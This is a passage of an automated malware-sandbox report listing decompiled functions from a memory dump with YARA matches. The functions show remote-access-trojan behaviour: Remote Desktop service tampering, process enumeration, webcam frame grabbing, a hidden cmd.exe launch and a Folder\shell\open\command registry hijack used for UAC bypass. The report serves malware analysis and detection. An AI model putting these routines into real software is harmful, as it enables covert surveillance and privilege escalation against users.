                                  						_t9 = 0;
                                  					}
                                  					return _t9;
                                  				}
                                  				return _t3;
                                  			}

                                  0x0040d348
                                  0x0040d34b
                                  0x0040d351
                                  0x0040d355
                                  0x0040d366
                                  0x0040d36a
                                  0x0040d38e
                                  0x0040d392
                                  0x0040d392
                                  0x0040d39a
                                  0x0040d39d
                                  0x0040d39f
                                  0x0040d36c
                                  0x0040d36d
                                  0x0040d373
                                  0x0040d373
                                  0x00000000
                                  0x0040d3a1
                                  0x0040d3a5

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D34B
                                  • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D360
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D36D
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D386
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID: ServicesActive
                                  • API String ID: 493672254-3071072050
                                  • Opcode ID: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction ID: 1675453761964aa3b76a2eaeb2c7b583256337f413fea86e2beca60fa8f39388
                                  • Opcode Fuzzy Hash: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction Fuzzy Hash: 3FF0FC3170432577C7211B76AC48EDB3F6CDBCA7707014232FA11E22D0CA74CC0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0040EFC1(void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char* _t8;
                                  				void* _t11;
                                  				void* _t16;
                                  				short* _t19;
                                  
                                  				_t19 = 0;
                                  				_v8 = __edx;
                                  				_t16 = OpenSCManagerW(0, L"ServicesActive", 1);
                                  				if(_t16 != 0) {
                                  					_t11 = OpenServiceW(_t16, L"TermService", 4);
                                  					if(_t11 != 0) {
                                  						_t8 =  &_v12;
                                  						__imp__QueryServiceStatusEx(_t11, 0, _v8, 0x24, _t8);
                                  						_t19 = _t8;
                                  						CloseServiceHandle(_t11);
                                  					}
                                  					CloseServiceHandle(_t16);
                                  				}
                                  				return _t19;
                                  			}

                                  0x0040efcf
                                  0x0040efd1
                                  0x0040efdb
                                  0x0040efdf
                                  0x0040eff0
                                  0x0040eff4
                                  0x0040eff6
                                  0x0040f001
                                  0x0040f008
                                  0x0040f00a
                                  0x0040f00a
                                  0x0040f011
                                  0x0040f017
                                  0x0040f01d

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,00000000,?,?,?,0040E78B), ref: 0040EFD5
                                  • OpenServiceW.ADVAPI32(00000000,TermService,00000004,?,?,?,?,0040E78B), ref: 0040EFEA
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,?,?,0040E78B), ref: 0040F001
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F00A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F011
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                  • String ID: ServicesActive$TermService
                                  • API String ID: 2623946379-1374911754
                                  • Opcode ID: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction ID: 13b6eb68be2015eef051f6e1ac84f9e35e5ae5cb34c12eee95212088573f76c3
                                  • Opcode Fuzzy Hash: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction Fuzzy Hash: C4F0B472240310BBD7214BA5AC8DEEB7EBCEB8DB50B104175F701A2140DAB48D009668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00405DE9(void* __ecx) {
                                  				_Unknown_base(*)()* _t2;
                                  				void* _t4;
                                  
                                  				_t4 = __ecx;
                                  				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                  				if(_t4 == 0) {
                                  					if(_t2 != 0) {
                                  						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
                                  					}
                                  					ExitProcess(1);
                                  				}
                                  				return _t2;
                                  			}

                                  0x00405def
                                  0x00405dfd
                                  0x00405e06
                                  0x00405e0a
                                  0x00405e1d
                                  0x00405e1d
                                  0x00405e21
                                  0x00405e21
                                  0x00405e27

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405DF1
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,?,?,?,?,?,?,?,00405B9D,?,00000000,.bss), ref: 00405DFD
                                  • ExitProcess.KERNEL32 ref: 00405E21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                  • API String ID: 881411216-1361702557
                                  • Opcode ID: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction ID: 25954cca20eb1c260ad7c814922471eb5b696a72d0fb51094525e610711aea92
                                  • Opcode Fuzzy Hash: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction Fuzzy Hash: E5D017707C93003AEA1037A0AC4EFD737348B45B51F244462BA45A61D1C9E98986C9AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004060B0() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                  				if(_t2 != 0) {
                                  					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
                                  				}
                                  				ExitProcess(1);
                                  			}

                                  0x004060c1
                                  0x004060c9
                                  0x004060dc
                                  0x004060dc
                                  0x004060e0

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004060B5
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004060C1
                                  • ExitProcess.KERNEL32 ref: 004060E0
                                  Strings
                                  • PureCall, xrefs: 004060D0
                                  • USER32.DLL, xrefs: 004060B0
                                  • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004060D5
                                  • MessageBoxA, xrefs: 004060BB
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                  • API String ID: 881411216-4134947204
                                  • Opcode ID: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction ID: bd81d5c7f3da7a5dda9c96caca806214e81eb27f708d7e513293adb5dabf46c5
                                  • Opcode Fuzzy Hash: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction Fuzzy Hash: 04D0C2303C83016AE6103BA0AD4EF9636355B04B51F244962B605A51D1DAE99592D56D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E004122CA(void* __ecx, void* __edx, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				intOrPtr _v32;
                                  				int _v36;
                                  				intOrPtr _v40;
                                  				int _v44;
                                  				char _v568;
                                  				long _v596;
                                  				char _v600;
                                  				void* _v604;
                                  				char _v1644;
                                  				intOrPtr _t49;
                                  				int _t54;
                                  				struct tagPROCESSENTRY32W* _t57;
                                  				int _t73;
                                  				int _t77;
                                  				int _t89;
                                  				void* _t91;
                                  				void* _t112;
                                  				void* _t113;
                                  				void* _t115;
                                  				void* _t117;
                                  				signed int _t119;
                                  				void* _t120;
                                  				signed int _t122;
                                  				void* _t123;
                                  				intOrPtr* _t124;
                                  				void* _t125;
                                  
                                  				_t125 = __eflags;
                                  				_t112 = __edx;
                                  				_t91 = __ecx;
                                  				E00401052( &_v600, 0, 0x228);
                                  				_t124 = _t123 + 0xc;
                                  				_v604 = 0x22c;
                                  				_v36 = 0;
                                  				_t49 = 5;
                                  				_v32 = _t49;
                                  				_v40 = _t49;
                                  				E00401735( &_v44, _t125);
                                  				_t113 = CreateToolhelp32Snapshot(2, 0);
                                  				if(_t113 == 0xffffffff) {
                                  					L14:
                                  					E0040136C(_t91, __eflags,  &_v44);
                                  					_t54 = _v44;
                                  					__eflags = _t54;
                                  					if(_t54 != 0) {
                                  						_t119 =  *(_t54 - 4);
                                  						_t115 = _t119 * 0xc + _t54;
                                  						__eflags = _t119;
                                  						if(_t119 != 0) {
                                  							do {
                                  								_t115 = _t115 - 0xc;
                                  								E00401468(_t115);
                                  								_t119 = _t119 - 1;
                                  								__eflags = _t119;
                                  							} while (_t119 != 0);
                                  						}
                                  					}
                                  				} else {
                                  					_t57 =  &_v604;
                                  					Process32FirstW(_t113, _t57);
                                  					_t127 = _t57;
                                  					if(_t57 != 0) {
                                  						do {
                                  							_v16 = _v596;
                                  							_v12 = 0;
                                  							_v8 = 0;
                                  							E00403411( &_v12, _t112,  &_v568);
                                  							_t120 = OpenProcess(0x1410, 0, _v596);
                                  							__eflags = _t120 - 0xffffffff;
                                  							if(_t120 == 0xffffffff) {
                                  								E00403549( &_v8, E004036F7( &_v28, "-"));
                                  								E00405FEB(_v28);
                                  								_t34 =  &_v28;
                                  								 *_t34 = _v28 & 0x00000000;
                                  								__eflags =  *_t34;
                                  							} else {
                                  								E00401052( &_v1644, 0, 0x410);
                                  								_t124 = _t124 + 0xc;
                                  								_t77 =  &_v1644;
                                  								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
                                  								__eflags = _t77;
                                  								if(_t77 == 0) {
                                  									E00403549( &_v8, E004036F7( &_v24, "-"));
                                  									E00405FEB(_v24);
                                  									_t29 =  &_v24;
                                  									 *_t29 = _v24 & 0x00000000;
                                  									__eflags =  *_t29;
                                  								} else {
                                  									E00403549( &_v8, E004036F7( &_v20,  &_v1644));
                                  									E00405FEB(_v20);
                                  									_v20 = _v20 & 0x00000000;
                                  								}
                                  								CloseHandle(_t120);
                                  							}
                                  							_t124 = _t124 - 0xc;
                                  							_t121 = _t124;
                                  							 *_t124 = _v16;
                                  							E0040373F(_t121 + 4,  &_v12);
                                  							E0040373F(_t121 + 8,  &_v8);
                                  							E00401612( &_v44);
                                  							E00401468( &_v16);
                                  							_t73 = Process32NextW(_t113,  &_v604);
                                  							_push(0);
                                  							_pop(0);
                                  							__eflags = _t73;
                                  						} while (__eflags != 0);
                                  						CloseHandle(_t113);
                                  						goto L14;
                                  					} else {
                                  						CloseHandle(_t113);
                                  						E0040136C(_t91, _t127,  &_v44);
                                  						_t89 = _v44;
                                  						if(_t89 != 0) {
                                  							_t122 =  *(_t89 - 4);
                                  							_t117 = _t122 * 0xc + _t89;
                                  							if(_t122 != 0) {
                                  								do {
                                  									_t117 = _t117 - 0xc;
                                  									E00401468(_t117);
                                  									_t122 = _t122 - 1;
                                  								} while (_t122 != 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t91;
                                  			}

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412310
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412329
                                  • CloseHandle.KERNEL32(00000000), ref: 00412334
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0041239E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004123D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00412427
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041248B
                                  • CloseHandle.KERNEL32(00000000), ref: 0041249D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                  • String ID:
                                  • API String ID: 3514491001-0
                                  • Opcode ID: babc51e94c953db9c4795247eb29058f625cbeb4a831d280a4be1ab3179b6415
                                  • Instruction ID: 76f310ec451ec7d85fc7bdc68f8874500a32d320933bf00d65e3e2fac8afd17e
                                  • Opcode Fuzzy Hash: babc51e94c953db9c4795247eb29058f625cbeb4a831d280a4be1ab3179b6415
                                  • Instruction Fuzzy Hash: 86519472D00219ABCB10EBA5CD49AEF7B78AF54719F00017AF405B32D0DB789E85CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412155(WCHAR** __ecx) {
                                  				short _v524;
                                  				intOrPtr _v552;
                                  				void* _v560;
                                  				struct tagPROCESSENTRY32W* _t8;
                                  				WCHAR* _t9;
                                  				WCHAR** _t17;
                                  				void* _t19;
                                  
                                  				_t17 = __ecx;
                                  				_v560 = 0x22c;
                                  				_t19 = CreateToolhelp32Snapshot(2, 0);
                                  				if(_t19 == 0xffffffff) {
                                  					L6:
                                  					return 0;
                                  				}
                                  				_t8 =  &_v560;
                                  				Process32FirstW(_t19, _t8);
                                  				while(_t8 != 0) {
                                  					_t9 = CharLowerW( *_t17);
                                  					if(lstrcmpW(CharLowerW( &_v524), _t9) == 0) {
                                  						CloseHandle(_t19);
                                  						return _v552;
                                  					}
                                  					_t8 = Process32NextW(_t19,  &_v560);
                                  				}
                                  				CloseHandle(_t19);
                                  				goto L6;
                                  			}


                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                  • CharLowerW.USER32(00000000), ref: 0041218F
                                  • CharLowerW.USER32(?), ref: 0041219D
                                  • lstrcmpW.KERNEL32(00000000,?,00000000), ref: 004121A4
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004121B6
                                  • CloseHandle.KERNEL32(00000000), ref: 004121C1
                                  • CloseHandle.KERNEL32(00000000), ref: 004121CE
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CharCloseHandleLowerProcess32$CreateFirstNextSnapshotToolhelp32lstrcmp
                                  • String ID:
                                  • API String ID: 1363071124-0
                                  • Opcode ID: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction ID: 4666fb41372ad6f73eaae79bd09a069f05ab8e19623d47d36fdabbe8d344061e
                                  • Opcode Fuzzy Hash: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction Fuzzy Hash: 9B018F71505224BBD711ABB4AC4CEDF7BBCEB09351F1481A1FA01D2290D77889928B7D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 52%
                                  			E00414CB1(signed int __ecx, signed int _a4) {
                                  				intOrPtr _v38;
                                  				intOrPtr _v44;
                                  				intOrPtr _v48;
                                  				void* _v112;
                                  				char _v128;
                                  				intOrPtr _v132;
                                  				char _v200;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t54;
                                  				intOrPtr* _t58;
                                  				intOrPtr* _t60;
                                  				intOrPtr* _t71;
                                  				signed int _t76;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t79;
                                  				intOrPtr* _t80;
                                  				intOrPtr* _t85;
                                  				signed int _t91;
                                  				intOrPtr* _t96;
                                  				intOrPtr* _t97;
                                  				intOrPtr* _t104;
                                  				signed int _t107;
                                  				intOrPtr* _t111;
                                  				intOrPtr* _t112;
                                  				intOrPtr* _t113;
                                  				intOrPtr* _t118;
                                  				void* _t119;
                                  				void* _t120;
                                  				void* _t121;
                                  
                                  				_t76 = __ecx;
                                  				__imp__CoInitialize(0);
                                  				_t111 = __ecx + 0x18;
                                  				__imp__CoCreateInstance(0x4175c0, 0, 1, 0x41a79c, _t111);
                                  				_t78 =  *_t111;
                                  				if(_t78 != 0) {
                                  					_t104 = __ecx + 0x1c;
                                  					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x4175a0, _t104);
                                  					_t79 =  *_t104;
                                  					if(_t79 != 0) {
                                  						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
                                  						_t112 = __ecx + 0x20;
                                  						if(_t112 != 0) {
                                  							_t49 = E00414A12(_a4, _t112);
                                  						}
                                  						if( *_t112 != 0) {
                                  							_t113 = _t76 + 0x24;
                                  							__imp__CoCreateInstance(0x417610, 0, 1, 0x41a78c, _t113);
                                  							_t80 =  *_t113;
                                  							if(_t80 != 0) {
                                  								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
                                  								_t54 =  *_t113;
                                  								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
                                  								E00401052( &_v128, 0, 0x48);
                                  								_t58 =  *((intOrPtr*)(_t76 + 0x18));
                                  								_t121 = _t120 + 0xc;
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
                                  								_t49 = E0041462F();
                                  								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
                                  								if(_t49 != 0) {
                                  									_t49 = E0041464B();
                                  									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
                                  									if(_t49 != 0) {
                                  										_t85 =  *((intOrPtr*)(_t76 + 0x24));
                                  										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
                                  										if(_t49 >= 0) {
                                  											_t60 =  *((intOrPtr*)(_t76 + 0x18));
                                  											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
                                  											E0040102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
                                  											E00414492( &_v200);
                                  											_t107 = _a4;
                                  											E00414AD1(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
                                  											E00405DE9(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
                                  											_t91 = 7;
                                  											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
                                  											E0041457F( *_t76);
                                  											_t49 = E0041462F();
                                  											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
                                  											if(_t49 != 0) {
                                  												_t71 =  *((intOrPtr*)(_t76 + 0x18));
                                  												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
                                  												_t96 =  *((intOrPtr*)(_t76 + 0x24));
                                  												_t118 = _t76 + 0x34;
                                  												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x4175e0, _t118);
                                  												_t97 =  *_t118;
                                  												if(_t97 != 0) {
                                  													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t49;
                                  			}

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00414CC1
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,?), ref: 00414CD9
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414D33
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$Initialize
                                  • String ID: Grabber$Source$vids
                                  • API String ID: 1108742289-4200688928
                                  • Opcode ID: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction ID: c707b6f7033061667e34d12cbb2bfaee6e47a2410d4a0b7bdeab57eb5d8e2362
                                  • Opcode Fuzzy Hash: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction Fuzzy Hash: 1C518A71600200AFDF14DF64C885E9A3BB6BF89715B2041ADFD05AF291CB79ED85CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00407A8E(void* __eflags) {
                                  				char _v8;
                                  				struct _PROCESS_INFORMATION _v24;
                                  				struct _STARTUPINFOA _v100;
                                  				CHAR* _t27;
                                  
                                  				_v8 = 0;
                                  				E00410CFF( &_v8);
                                  				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                  				GetWindowsDirectoryA(_t27, 0x104);
                                  				E0040102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
                                  				E00401052( &_v100, 0, 0x44);
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
                                  					return E00410CD8(_v8);
                                  				}
                                  				Sleep(0x3e8);
                                  				return _v24.dwProcessId;
                                  			}

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 00407AB1
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407ABF
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407ACD
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00407B07
                                  • Sleep.KERNEL32(000003E8), ref: 00407B16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 2560724043-2003734499
                                  • Opcode ID: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction ID: 526d35256bd352fe19e6f9b51bef16261156da3b9883bb0cb5aadd8e9d8f3863
                                  • Opcode Fuzzy Hash: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction Fuzzy Hash: E51170B1A4430DBBE710A7A9CC86FEF767CEB04748F000036F206B6191DA74AE0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412E91() {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				struct _SECURITY_DESCRIPTOR* _v20;
                                  				struct _SECURITY_ATTRIBUTES _v24;
                                  				struct _SECURITY_DESCRIPTOR _v44;
                                  				long _t20;
                                  
                                  				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
                                  					L5:
                                  					return 0;
                                  				} else {
                                  					_v24 = 0xc;
                                  					_v20 =  &_v44;
                                  					_v16 = 0;
                                  					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
                                  					if(_t20 != 0) {
                                  						SetLastError(_t20);
                                  						goto L5;
                                  					}
                                  					RegCloseKey(_v8);
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412E9E
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412EB2
                                  • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00413187,?), ref: 00412EEA
                                  • RegCloseKey.ADVAPI32(00413187), ref: 00412EF7
                                  • SetLastError.KERNEL32(00000000), ref: 00412F02
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412EE0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1473660444-2536721355
                                  • Opcode ID: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction ID: 82a2526e36d2d6463d42065251312d8bdf4d9f0b426d0c692092d159b657fe2b
                                  • Opcode Fuzzy Hash: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction Fuzzy Hash: C5011A71905228AADF209BA19D49FDFBFBDEF09750F004122FA05F2140D7B49685DAA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040906F(char _a4, intOrPtr _a8) {
                                  				void _v28;
                                  				void* _t13;
                                  				signed int _t14;
                                  
                                  				InitializeCriticalSection( &_v28);
                                  				_t14 = 6;
                                  				DeleteCriticalSection(memcpy(0x55a808,  &_v28, _t14 << 2));
                                  				EnterCriticalSection(0x55a808);
                                  				_t5 =  &_a4; // 0x402f48
                                  				 *0x55a830 =  *_t5;
                                  				GetModuleHandleA(0);
                                  				 *0x42675c = 0x559de0;
                                  				if(_a8 == 0) {
                                  					E00401F98(0x55a854);
                                  					 *0x559de0 = 1;
                                  					_t13 = E00401F6D(0x55a84c, E00408D0F, 0x559de0);
                                  				} else {
                                  					_t13 = E00401F6D(0x55a854, E00407F94, 0x559de0);
                                  					 *0x55a7f4 = 1;
                                  				}
                                  				LeaveCriticalSection(0x55a808);
                                  				return _t13;
                                  			}

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                  • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                  • EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                  • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                  • LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                    • Part of subcall function 00401F6D: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                  • String ID: H/@
                                  • API String ID: 2964645253-3842538647
                                  • Opcode ID: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction ID: f99a12277a3120933ea65728b4e70e144b28dbd7bebc7df26f1967f06ae464e9
                                  • Opcode Fuzzy Hash: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction Fuzzy Hash: 9D017131A04205ABCB10AB65EC19BDB3FB9FB44716F00413BFA05A72D1C779544ACB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040910D() {
                                  				intOrPtr _t1;
                                  
                                  				_t1 = 5;
                                  				 *0x55a804 = _t1;
                                  				 *0x559dec = 0;
                                  				 *0x55a7fc = _t1;
                                  				 *0x55a800 = 0;
                                  				E004018C7(0x55a7f8, 0);
                                  				InitializeCriticalSection(0x55a808);
                                  				E004113ED(0x55a834, 0);
                                  				asm("xorps xmm0, xmm0");
